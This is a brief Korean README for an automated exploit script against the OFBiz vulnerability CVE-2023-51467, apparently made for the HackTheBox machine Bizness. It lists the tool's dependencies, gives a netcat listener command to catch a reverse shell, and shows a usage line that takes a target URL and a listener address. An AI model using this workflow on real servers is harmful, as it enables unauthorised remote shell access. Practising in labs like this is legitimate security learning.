
# CVE-2023-51467에 대한 Java 웹 프레임워크 OFBiz 자동 익스플로잇 스크립트

Java 웹 프레임워크 OF Biz의 CVE-2023-51467 취약점을 위한 자동 익스플로잇 스크립트입니다. HackTheBox 머신 Bizness에서 영감을 받았습니다.
이 스크립트는 ysoserial 도구와 OpenJDK 11 버전이 필요합니다. 설치 방법은 사용법 메뉴를 참조하세요.
선호하는 방법으로 셸을 캐치할 리스너를 설정하세요. netcat 예시는 다음과 같습니다:
nc -nlvp 1337
스크립트를 실행하세요:
python3 badbizness.py [ysoserial-all.jar 경로] [대상 기본 URL] [리스너 IP] [리스너 포트]
python3 badbizness.py /home/twopoint/ysoserial-all.jar http://example.com:1337 10.10.10.10. 1337
이 도구는 Python에 대해 더 배우기 위한 목적으로 만들어졌습니다. 저는 이 스크립트가 많은 도움이 되었음을 인정합니다.